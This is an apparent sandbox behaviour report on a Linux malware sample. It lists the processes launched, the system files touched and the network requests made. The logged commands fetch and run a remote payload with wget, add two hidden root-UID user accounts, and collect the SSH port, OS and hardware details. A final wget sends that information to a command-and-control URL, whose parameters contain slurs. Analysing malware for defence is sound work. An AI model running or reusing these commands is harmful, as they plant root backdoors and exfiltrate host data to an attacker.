Technical Information
Malicious functions:
Removes itself
Launches processes:
- bash
- wget -q http://thebestperlscripts.cf/.../os -O protections
- chmod 777 protections
- ./protections
- tr -d ./
- clear
- useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system
- useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os
- nscd -i passwd
- nscd -i group
- passwd system
- passwd os
- grep -Ew #Port|Port /etc/ssh/sshd_config
- head -n1
- awk {print $2}
- lsb_release -d
- awk {$1= \"\"; print $0}
- nproc --all
- free -mt
- grep Total:
- wget -qO- http://5.135.9.132/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=22&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS= Debian GNU/Linux 8.3 (jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
Performs operations with the file system:
Modifies file access rights:
- /root/protections
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
- /etc/nshadow
Creates symlinks:
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /etc/shadow.lock
Creates or modifies files:
- /root/protections
- /etc/.pwd.lock
- /etc/passwd.720
- /etc/group.720
- /etc/gshadow.720
- /etc/subuid.720
- /etc/subgid.720
- /etc/shadow.720
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /etc/passwd.724
- /etc/group.724
- /etc/gshadow.724
- /etc/subuid.724
- /etc/subgid.724
- /etc/shadow.724
- /etc/nshadow
Deletes files:
- /etc/passwd.720
- /etc/group.720
- /etc/gshadow.720
- /etc/subuid.720
- /etc/subgid.720
- /etc/shadow.720
- /etc/shadow.lock
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /etc/passwd.724
- /etc/group.724
- /etc/gshadow.724
- /etc/subuid.724
- /etc/subgid.724
- /etc/shadow.724
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- th#######rlscripts.cf/.../os
- http://#.###.#.##########################.#####################HECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=%20Debian%20GNU/Linux%208.3%20(jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
DNS ASK:
- th#####perlscripts.cf
Other:
Collects CPU information
Collects RAM information
